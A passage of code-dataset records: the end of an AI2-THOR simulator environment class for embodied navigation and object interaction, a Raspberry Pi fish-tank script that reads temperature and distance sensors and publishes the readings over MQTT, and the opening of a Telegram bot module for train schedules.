self.event.metadata['lastActionSuccess']:\n self.camera_horizon += -angle\n elif self.args.approx_last_action_success and self.success_for_look(action['action']):\n self.camera_horizon += -angle\n elif \"LookDown\" in action['action']:\n angle = float(action['action'].split(\"_\")[1])\n self.event= self.look_angle(angle)\n if not(self.args.approx_last_action_success) and self.event.metadata['lastActionSuccess']:\n self.camera_horizon += angle\n elif self.args.approx_last_action_success and self.success_for_look(action['action']):\n self.camera_horizon += angle\n else:\n self.event = super().step(action)\n \n\n self.event =self.update_states(action)\n self.check_post_conditions(action)\n \n # Get pose change\n if not(self.args.approx_pose):\n if self.consecutive_steps == False:\n dx, dy, do = self.get_pose_change()\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n else:\n if self.final_sidestep:\n dx, dy, do = self.get_pose_change()\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n else:\n pass\n else:\n if self.args.approx_last_action_success:\n whether_success = self.success_for_look(action['action'])\n else:\n whether_success = self.event.metadata['lastActionSuccess']\n if self.consecutive_steps:\n last_action = action['action']\n dx, dy, do = self.get_pose_change_approx_relative(last_action, whether_success)\n self.accumulated_pose += np.array([dx, dy, do])\n if self.accumulated_pose[2] >= np.pi -1e-1:\n self.accumulated_pose[2] -= 2 * np.pi\n if self.final_sidestep:\n self.info['sensor_pose'] = copy.deepcopy(self.accumulated_pose).tolist()\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n self.accumulated_pose = np.array([0.0,0.0,0.0])\n self.o = 0.0\n else:\n last_action = action['action']\n dx, dy, do = self.get_pose_change_approx(last_action, whether_success)\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n \n \n \n done = self.get_done()\n \n if done:\n spl, success, dist = 0,0,0\n self.info['distance_to_goal'] = dist\n self.info['spl'] = spl\n self.info['success'] = success\n \n \n self.timestep += 1\n self.info['time'] = self.timestep\n \n\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n rew = 0.0\n \n self.steps_taken +=1\n \n return state, rew, done, self.info\n \n def sim_continuous_to_sim_map(self, sim_loc):\n #x, y, o = self.get_sim_location()\n x, y, o = sim_loc\n min_x, min_y = self.map_obj_origin/100.0\n x, y = int((-x - min_x)*20.), int((-y - min_y)*20.)\n\n o = np.rad2deg(o) + 180.0\n return y, x, o\n \n def get_pose_change(self):\n curr_sim_pose = self.get_sim_location()\n dx, dy, do = pu.get_rel_pose_change(curr_sim_pose, self.last_sim_location)\n self.last_sim_location = curr_sim_pose\n return dx, dy, do\n \n\n def get_sim_location(self):\n y = -self.event.metadata['agent']['position']['x']\n x = self.event.metadata['agent']['position']['z'] \n o = np.deg2rad(-self.event.metadata['agent']['rotation']['y'])\n if o > np.pi:\n o -= 2 * np.pi\n return x, y, o\n \n def get_metrics(self):\n curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())\n dist = self.gt_planner.fmm_dist[curr_loc[0], curr_loc[1]]/20.0\n if dist == 0.0:\n success = 1\n else:\n 
success = 0\n spl = min(success * self.starting_distance/self.path_length, 1)\n return spl, success, dist\n\n def get_done(self):\n if self.info['time'] >= self.args.max_episode_length-1:\n done = True\n elif self.stopped:\n done = True\n else:\n done = False\n return done\n\n\n def check_post_conditions(self, action):\n '''\n handle special action post-conditions\n '''\n if action['action'] == 'ToggleObjectOn':\n self.check_clean(action['objectId'])\n\n def update_states(self, action):\n '''\n extra updates to metadata after step\n '''\n event = self.event\n if event.metadata['lastActionSuccess']:\n # clean\n if action['action'] == 'ToggleObjectOn' and \"Faucet\" in action['objectId']:\n sink_basin = get_obj_of_type_closest_to_obj('SinkBasin', action['objectId'], event.metadata)\n cleaned_object_ids = sink_basin['receptacleObjectIds']\n self.cleaned_objects = self.cleaned_objects | set(cleaned_object_ids) if cleaned_object_ids is not None else set()\n # heat\n if action['action'] == 'ToggleObjectOn' and \"Microwave\" in action['objectId']:\n microwave = get_objects_of_type('Microwave', event.metadata)[0]\n heated_object_ids = microwave['receptacleObjectIds']\n self.heated_objects = self.heated_objects | set(heated_object_ids) if heated_object_ids is not None else set()\n # cool\n if action['action'] == 'CloseObject' and \"Fridge\" in action['objectId']:\n fridge = get_objects_of_type('Fridge', event.metadata)[0]\n cooled_object_ids = fridge['receptacleObjectIds']\n self.cooled_objects = self.cooled_objects | set(cooled_object_ids) if cooled_object_ids is not None else set()\n\n return event\n\n def get_transition_reward(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for transition_reward\")\n else:\n return self.task.transition_reward(self.event)\n\n def get_goal_satisfied(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for goal_satisfied\")\n else:\n return self.task.goal_satisfied(self.event)\n\n def get_goal_conditions_met(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for goal_satisfied\")\n else:\n return self.task.goal_conditions_met(self.event)\n\n def get_subgoal_idx(self):\n if self.task is None:\n raise Exception(\"WARNING: no task setup for subgoal_idx\")\n else:\n return self.task.get_subgoal_idx()\n\n def noop(self):\n '''\n do nothing\n '''\n super().step(dict(action='Pass'))\n\n def smooth_move_ahead(self, action, render_settings=None):\n '''\n smoother MoveAhead\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n smoothing_factor = constants.RECORD_SMOOTHING_FACTOR\n new_action = copy.deepcopy(action)\n new_action['moveMagnitude'] = constants.AGENT_STEP_SIZE / smoothing_factor\n\n new_action['renderImage'] = render_settings['renderImage']\n new_action['renderClassImage'] = render_settings['renderClassImage']\n new_action['renderObjectImage'] = render_settings['renderObjectImage']\n new_action['renderDepthImage'] = render_settings['renderDepthImage']\n\n events = []\n for xx in range(smoothing_factor - 1):\n event = super().step(new_action)\n if event.metadata['lastActionSuccess']:\n events.append(event)\n\n event = super().step(new_action)\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def smooth_rotate(self, action, render_settings=None):\n '''\n smoother RotateLeft and RotateRight\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = 
np.round(event.metadata['agent']['cameraHorizon'], 4)\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']\n start_rotation = rotation['y']\n if action['action'] == 'RotateLeft':\n end_rotation = (start_rotation - 30)\n else:\n end_rotation = (start_rotation + 30)\n\n events = []\n for xx in np.arange(.1, 1.0001, .1):\n if xx < 1:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(start_rotation * (1 - xx) + end_rotation * xx, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n else:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(start_rotation * (1 - xx) + end_rotation * xx, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n }\n event = super().step(teleport_action)\n\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def smooth_look(self, action, render_settings=None):\n '''\n smoother LookUp and LookDown\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n start_horizon = event.metadata['agent']['cameraHorizon']\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = start_horizon + constants.AGENT_HORIZON_ADJ * (1 - 2 * int(action['action'] == 'LookUp'))\n position = event.metadata['agent']['position']\n\n events = []\n for xx in np.arange(.1, 1.0001, .1):\n if xx < 1:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(start_horizon * (1 - xx) + end_horizon * xx, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n else:\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(start_horizon * (1 - xx) + end_horizon * xx, 3),\n }\n event = super().step(teleport_action)\n\n if event.metadata['lastActionSuccess']:\n events.append(event)\n return events\n\n def height_change(self, height_change, render_settings=None):\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = event.metadata['agent']['cameraHorizon']\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']['y']\n \n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'] + height_change,\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n #event = super().step(teleport_action)\n #return event\n 
event = super().step(teleport_action)\n \n self.event = event\n dx, dy, do = self.get_pose_change()\n #print(\"pose change is \", dx, dy, do)\n self.info['sensor_pose'] = [dx, dy, do]\n self.path_length += pu.get_l2_distance(0, dx, 0, dy)\n \n done = self.get_done()\n \n if done:\n #spl, success, dist = self.get_metrics()\n spl, success, dist = 0,0,0\n #print(\"spl, succ, dist: {}, {}, {}\".format(spl, success, dist))\n self.info['distance_to_goal'] = dist\n self.info['spl'] = spl\n self.info['success'] = success\n \n self.timestep += 1\n self.info['time'] = self.timestep\n \n rgb = torch.tensor(self.event.frame.copy()).numpy() #shape (h, w, 3)\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0\n depth = np.expand_dims(depth, 2)\n \n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n \n rew = 0.0\n return state, rew, done, self.info\n\n def look_angle(self, angle, render_settings=None):\n '''\n look at a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n start_horizon = event.metadata['agent']['cameraHorizon']\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = start_horizon + angle\n position = event.metadata['agent']['position']\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(end_horizon, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n self.view_angle += angle\n return event\n \n def set_horizon(self, angle, render_settings=None):\n '''\n set the camera horizon to a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n rotation = np.round(event.metadata['agent']['rotation']['y'], 4)\n end_horizon = angle\n position = event.metadata['agent']['position']\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': rotation,\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': np.round(end_horizon, 3),\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n event = super().step(teleport_action)\n return event\n\n def rotate_angle(self, angle, render_settings=None):\n '''\n rotate at a specific angle\n '''\n if render_settings is None:\n render_settings = DEFAULT_RENDER_SETTINGS\n event = self.event\n horizon = np.round(event.metadata['agent']['cameraHorizon'], 4)\n position = event.metadata['agent']['position']\n rotation = event.metadata['agent']['rotation']\n start_rotation = rotation['y']\n end_rotation = start_rotation + angle\n\n teleport_action = {\n 'action': 'TeleportFull',\n 'rotation': np.round(end_rotation, 3),\n 'x': position['x'],\n 'z': position['z'],\n 'y': position['y'],\n 'horizon': horizon,\n 'tempRenderChange': True,\n 'renderNormalsImage': False,\n 'renderImage': 
render_settings['renderImage'],\n 'renderClassImage': render_settings['renderClassImage'],\n 'renderObjectImage': render_settings['renderObjectImage'],\n 'renderDepthImage': render_settings['renderDepthImage'],\n }\n super().step(teleport_action)\n\n def to_thor_api_exec(self, action, object_id=\"\", smooth_nav=False):\n action_received = copy.deepcopy(action)\n self.action_received =action_received\n self.last_action = action_received\n\n if \"RotateLeft\" in action:\n action = dict(action=\"RotateLeft\", degrees = \"90\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"RotateRight\" in action:\n action = dict(action=\"RotateRight\", degrees = \"90\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"MoveAhead\" in action:\n action = dict(action=\"MoveAhead\",\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"LookUp\" in action:\n #if abs(self.event.metadata['agent']['cameraHorizon']-0) <5:\n if abs(self.camera_horizon - 0) <5:\n action = dict(action=\"LookUp_0\",\n forceAction=True)\n else:\n action = dict(action=action,\n forceAction=True)\n obs, rew, done, info = self.step(action, smooth_nav=smooth_nav)\n elif \"LookDown\" in action:\n #if abs(self.event.metadata['agent']['cameraHorizon'] - 90) <5:\n if abs(self.camera_horizon - 90) <5:\n action = dict(action=\"LookDown_0\",\n forceAction=True)\n else:\n action = dict(action=action,\n forceAction=True)\n obs, rew, done, info= self.step(action, smooth_nav=smooth_nav)\n elif \"OpenObject\" in action:\n action = dict(action=\"OpenObject\",\n objectId=object_id,\n moveMagnitude=1.0)\n obs, rew, done, info = self.step(action)\n elif \"CloseObject\" in action:\n action = dict(action=\"CloseObject\",\n objectId=object_id,\n forceAction=True)\n obs, rew, done, info = self.step(action)\n elif \"PickupObject\" in action:\n action = dict(action=\"PickupObject\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n elif \"PutObject\" in action:\n inventory_object_id = self.event.metadata['inventoryObjects'][0]['objectId']\n new_inventory_object_id = self.event.metadata['inventoryObjects'][0]['objectId']\n action = dict(action=\"PutObject\",\n objectId=inventory_object_id,\n receptacleObjectId=object_id,\n forceAction=True,\n placeStationary=True)\n obs, rew, done, info = self.step(action)\n elif \"ToggleObjectOn\" in action:\n action = dict(action=\"ToggleObjectOn\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n\n elif \"ToggleObjectOff\" in action:\n action = dict(action=\"ToggleObjectOff\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n elif \"SliceObject\" in action:\n # check if agent is holding knife in hand\n inventory_objects = self.event.metadata['inventoryObjects']\n if len(inventory_objects) == 0 or 'Knife' not in inventory_objects[0]['objectType']:\n raise Exception(\"Agent should be holding a knife before slicing.\")\n\n action = dict(action=\"SliceObject\",\n objectId=object_id)\n obs, rew, done, info = self.step(action)\n else:\n raise Exception(\"Invalid action. Conversion to THOR API failed! (action='\" + str(action) + \"')\")\n\n return obs, rew, done, info, self.event, action\n \n\n def check_clean(self, object_id):\n '''\n Handle special case when Faucet is toggled on.\n In this case, we need to execute a `CleanAction` in the simulator on every object in the corresponding\n basin. 
This is to clean everything in the sink rather than just things touching the stream.\n '''\n event = self.event\n if event.metadata['lastActionSuccess'] and 'Faucet' in object_id:\n # Need to delay one frame to let `isDirty` update on stream-affected.\n self.step({'action': 'Pass'})\n event = self.event\n sink_basin_obj = game_util.get_obj_of_type_closest_to_obj(\"SinkBasin\", object_id, event.metadata)\n for in_sink_obj_id in sink_basin_obj['receptacleObjectIds']:\n if (game_util.get_object(in_sink_obj_id, event.metadata)['dirtyable']\n and game_util.get_object(in_sink_obj_id, event.metadata)['isDirty']):\n self.step({'action': 'CleanObject', 'objectId': in_sink_obj_id})\n return self.event\n\n def prune_by_any_interaction(self, instances_ids):\n '''\n ignores any object that is not interactable in anyway\n '''\n pruned_instance_ids = []\n for obj in self.event.metadata['objects']:\n obj_id = obj['objectId']\n if obj_id in instances_ids:\n if obj['pickupable'] or obj['receptacle'] or obj['openable'] or obj['toggleable'] or obj['sliceable']:\n pruned_instance_ids.append(obj_id) \n\n ordered_instance_ids = [id for id in instances_ids if id in pruned_instance_ids]\n return ordered_instance_ids\n \n \n def print_log(self, *statements):\n statements = [str(s) for s in statements]\n statements = ['step #: ', str(self.steps_taken) , \",\"] + statements\n joined = ' '.join(statements)\n #print(joined)\n self.logs.append(joined)\n\n #Interact if within visibility distance\n def va_interact(self, action, interact_mask=None, smooth_nav=False, mask_px_sample=1, debug=False):\n '''\n interact mask based action call\n '''\n\n all_ids = []\n\n if type(interact_mask) is str and interact_mask == \"NULL\":\n raise Exception(\"NULL mask.\")\n elif interact_mask is not None:\n # ground-truth instance segmentation mask from THOR\n instance_segs = np.array(self.event.instance_segmentation_frame)\n color_to_object_id = self.event.color_to_object_id\n\n # get object_id for each 1-pixel in the interact_mask\n nz_rows, nz_cols = np.nonzero(interact_mask)\n instance_counter = Counter()\n for i in range(0, len(nz_rows), mask_px_sample):\n x, y = nz_rows[i], nz_cols[i]\n instance = tuple(instance_segs[x, y])\n instance_counter[instance] += 1\n if debug:\n print(\"action_box\", \"instance_counter\", instance_counter)\n\n # iou scores for all instances\n iou_scores = {}\n for color_id, intersection_count in instance_counter.most_common():\n union_count = np.sum(np.logical_or(np.all(instance_segs == color_id, axis=2), interact_mask.astype(bool)))\n iou_scores[color_id] = intersection_count / float(union_count)\n iou_sorted_instance_ids = list(OrderedDict(sorted(iou_scores.items(), key=lambda x: x[1], reverse=True)))\n\n # get the most common object ids ignoring the object-in-hand\n inv_obj = self.event.metadata['inventoryObjects'][0]['objectId'] \\\n if len(self.event.metadata['inventoryObjects']) > 0 else None\n all_ids = [color_to_object_id[color_id] for color_id in iou_sorted_instance_ids\n if color_id in color_to_object_id and color_to_object_id[color_id] != inv_obj]\n\n # print all ids\n if debug:\n print(\"action_box\", \"all_ids\", all_ids)\n\n # print instance_ids\n instance_ids = [inst_id for inst_id in all_ids if inst_id is not None]\n instance_ids = self.prune_by_any_interaction(instance_ids)\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n\n # prune invalid instances like floors, walls, etc.\n if self.args.ground_truth_segmentation:\n pass\n else:\n instance_ids_new = 
self.prune_by_any_interaction(instance_ids)\n for instance_id in instance_ids:\n if 'Sink' in instance_id:\n instance_ids_new.append(instance_id)\n\n # cv2 imshows to show image, segmentation mask, interact mask\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n instance_seg *= 255\n\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', self.event.frame[:,:,::-1])\n cv2.waitKey(0)\n\n if len(instance_ids) == 0:\n if not (\"Rotate\" in action or \"MoveAhead\" in action or \"Look\" in action):\n err = \"Bad interact mask. Couldn't locate target object\"\n print(\"Went through bad interaction mask\")\n success = False\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n depth = np.expand_dims(depth, 2)\n\n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n return state, 0, False, self.info, False, None, \"\", err, None\n else:\n target_instance_id = \"\"\n if len(instance_ids) != 0:\n target_instance_id = instance_ids[0]\n \n else:\n target_instance_id = \"\"\n\n if debug:\n print(\"taking action: \" + str(action) + \" on target_instance_id \" + str(target_instance_id))\n try:\n obs, rew, done, infos, event, api_action = self.to_thor_api_exec(action, target_instance_id, smooth_nav)\n except Exception as err:\n success = False\n rgb = self.event.frame.copy() #shape (h, w, 3)\n rgb = cv2.cvtColor(rgb, cv2.COLOR_RGB2BGR)\n\n depth = torch.tensor(self.event.depth_frame.copy()).numpy() #shape (h, w)\n depth /= 1000.0 #in meters\n depth = np.expand_dims(depth, 2)\n\n state = np.concatenate((rgb, depth), axis = 2).transpose(2, 0, 1)\n return state, 0, False, self.info, success, None, \"\", err, None\n\n if not event.metadata['lastActionSuccess']:\n if interact_mask is not None and debug:\n print(\"Failed to execute action!\", action, target_instance_id)\n print(\"all_ids inside BBox: \" + str(all_ids))\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', self.event.frame[:,:,::-1])\n cv2.waitKey(0)\n print(event.metadata['errorMessage'])\n success = False\n if len(event.metadata['errorMessage']) >0:\n print(\"action that causes below error is \", api_action)\n return obs, rew, done, infos, success, event, target_instance_id, event.metadata['errorMessage'], api_action\n\n success = True\n\n return obs, rew, done, infos, success, event, target_instance_id, '', api_action\n\n @staticmethod\n def bbox_to_mask(bbox):\n return image_util.bbox_to_mask(bbox)\n\n @staticmethod\n def point_to_mask(point):\n return image_util.point_to_mask(point)\n\n @staticmethod\n def decompress_mask(compressed_mask):\n return image_util.decompress_mask(compressed_mask)\n \n def get_instance_mask(self):\n return self.event.instance_masks\n \n def close(self):\n self.stop()\n","repo_name":"soyeonm/FILM","sub_path":"alfred_utils/env/thor_env_code.py","file_name":"thor_env_code.py","file_ext":"py","file_size_in_byte":48982,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"74103190887","text":"import os\nimport glob\nimport time\nimport logging\nimport yaml\nimport datetime\nfrom gpiozero import 
DistanceSensor\n# from gpiozero.pins.pigpio import PiGPIOFactory\n\n\n# Pull in 1-Wire capabilities\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\n\n# Without a 1-wire device recognized here the code will crash/exit.\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28*')[0]\ndevice_file = device_folder + '/w1_slave'\n\n# Setup Logger\n# logging.disable(logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG,\n format=' %(asctime)s - %(levelname)s - %(message)s')\n\n# keep decimal to ensure float\nsleeptime = 5.0\n\n# Pins for the sensor.\necho_pin = 23\ntrigger_pin = 24\n\n# Switch from default to potentially more accurate readings.\n# factory = PiGPIOFactory()\n# need pigpio daemon:\n# sudo pigpiod\n\n# Create empty list-type variable so we can\n# store measurements\nsensor_measurements = []\n\n# For the Distance Sensor\n# Declare these variables at a top level so you can\n# easily edit them once for your whole script to\n# test performance\nupper_reasonable_bound = 200\nlower_reasonable_bound = 0\nrolling_average_size = 10\n\n# Limits for temperature sensor\ntemp_low = 25\ntemp_high = 95\n\n\n# 1-wire read\ndef read_temp_raw():\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines\n\n\n# 1-wire read and convert\ndef read_temp():\n lines = read_temp_raw()\n # Example:\n # Lines: ['a0 01 4b 46 7f ff 0c 10 cf : crc=cf YES\\n', 'a0 01 4b 46 7f ff 0c 10 cf t=26000\\n']\n # print(\"Lines: \" + str(lines))\n if (len(lines) < 1 or len(lines[0]) < 3): return None, None\n while lines[0].strip()[-3:] != 'YES':\n time.sleep(0.2)\n lines = read_temp_raw()\n equals_pos = lines[1].find('t=')\n if equals_pos != -1:\n temp_string = lines[1][equals_pos+2:]\n temp_c = float(temp_string) / 1000.0\n temp_f = temp_c * 9.0 / 5.0 + 32.0\n\n # Check that temperature is within limits.\n if temp_f > temp_high or temp_f < temp_low: \n return None, None\n return temp_c, temp_f\n # No 't=' marker found; report an invalid reading instead of falling through.\n return None, None\n\n\n# PID file for monit\ndef writePidFile():\n pid = str(os.getpid())\n currentFile = open('/tmp/1-wire.pid', 'w')\n currentFile.write(pid)\n currentFile.close()\n\n\ndef average(measurements):\n \"\"\"\n Use the builtin functions sum and len to make a quick average function\n \"\"\"\n # Handle division by zero error\n if len(measurements) != 0:\n return sum(measurements)/len(measurements)\n else:\n # When you use the average later, make sure to include something like\n # sensor_average = rolling_average(sensor_measurements)\n # if (conditions) and sensor_average > -1:\n # This way, -1 can be used as an \"invalid\" value\n return -1\n\n\ndef rolling_average(measurement, measurements):\n # Update rolling average if measurement is ok, otherwise\n # skip to returning the average from previous values\n if lower_reasonable_bound < measurement < upper_reasonable_bound:\n # Remove first item from list if it's full according to our chosen size\n if len(measurements) >= rolling_average_size:\n measurements.pop(0)\n measurements.append(measurement)\n return average(measurements)\n\n\nerrorcount = 0\n\n# device configs\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n\n# Setup MQTT\nclient = ''\nif cfg['mqtt']['enabled'] is True:\n import paho.mqtt.client as mqtt\n client = mqtt.Client(\"P1\") # create new instance\n client.connect(cfg['mqtt']['host']) # connect to broker\n # Loop start: These functions implement a threaded interface\n # to the network loop. 
Calling loop_start() once, before or after\n # connect*(), runs a thread in the background to call loop()\n # automatically. This frees up the main thread for other work\n # that may be blocking.\n client.loop_start()\n\nwritePidFile()\ndist_sensor = DistanceSensor(echo=echo_pin, trigger=trigger_pin) #, pin_factory=factory)\nstarttime = time.time()\nwhile True:\n # 1 -wire read:\n temps = read_temp()\n # print(\"Temp (C,F): \" + str(temps))\n\n # Distance Sensor measurement\n sensor_measurement = (dist_sensor.distance * 100)\n sensor_value = rolling_average(sensor_measurement, sensor_measurements)\n\n # fix for JSON, MQTT, InfluxDB\n s = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')\n timestamp = s[:-3]\n logging.debug(\"Timestamp, Data: \" + str(timestamp) + \", \" + str(temps[1])\n + \", Distance: \" + str(\"{:.2f}\".format(sensor_value)))\n if cfg['mqtt']['enabled'] is True:\n client.publish(cfg['mqtt']['topic'], '{ \"koi_temperature\":\"' +\n str(temps[1]) + '\", \"datetime\":\"' + str(timestamp) +\n '\", \"koi_distance\":\"' +\n str(\"{:.2f}\".format(sensor_value))\n + '\" }') # publish to mqtt\n time.sleep(sleeptime - ((time.time() - starttime) % sleeptime))\n","repo_name":"kmkingsbury/pi-fishtank-sensors","sub_path":"fishtank-sensors.py","file_name":"fishtank-sensors.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29182296915","text":"\"\"\"\nmcd.py - script for 'mcd' command\n\"\"\"\n\nimport typing\nimport logging\nfrom math import ceil\n\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.types import CallbackQuery, ChatActions\n\nimport text\nimport util\nfrom data import conn\nfrom util import schedule, callback_builder\nfrom scripts.search import schedule_kboard, get_selection_bar\n\n\nclass Call(typing.NamedTuple):\n DIR = 'DIR'\n TABLE = 'TABLE'\n MSTTO = 'MSTTO'\n MSTFROM = 'MSTFROM'\n CANCEL = 'CANCEL' # sys_command\n IGNORE = 'IGNORE' # sys_command\n DELETE = 'DELETE' # sys_command\n UPDATE = 'UPDATE' # skip to search_worker\n REVERSE = 'REVERSE' # skip to search_worker\n SCHEDULE = 'SCHEDULE' # skip to search_worker\n\n\nclass MarkupText(typing.NamedTuple):\n STTO = 'Станция назначения'\n STFROM = 'Станция отправления'\n MSTTO = 'Выбери станцию назначения'\n MSTFROM = 'Выбери станцию отправления'\n\n\ncallback_cancel = Call.CANCEL\ncallback_ignore = Call.IGNORE\ncallback_delete = Call.DELETE\n\n\nasync def mcd_table(root: typing.Dict[str, str]) -> InlineKeyboardMarkup:\n \"\"\"\n Builds mcd search table keyboard\n \"\"\"\n keyboard = InlineKeyboardMarkup(row_width=2)\n callback_to = await callback_builder(root, Call.MSTTO)\n callback_from = await callback_builder(root, Call.MSTFROM)\n callback_schedule = await callback_builder(root, Call.SCHEDULE)\n\n sto_field_is_completed = root.get('sto') not in (None, '')\n sfrom_field_is_completed = root.get('sfrom') not in (None, '')\n\n if sto_field_is_completed:\n station_to = conn.execute(\n 'SELECT name FROM station WHERE id = ?', (root['sto'],)\n ).fetchone()['name']\n else:\n station_to = ' '\n if sfrom_field_is_completed:\n station_from = conn.execute(\n 'SELECT name FROM station WHERE id = ?', (root['sfrom'],)\n ).fetchone()['name']\n else:\n station_from = ' '\n\n direction = conn.execute(\n 'SELECT name FROM direction WHERE id = ?', (root['dir'],)\n ).fetchone()['name']\n callback_dir = await callback_builder(root, Call.DIR)\n keyboard.add(InlineKeyboardButton(direction, 
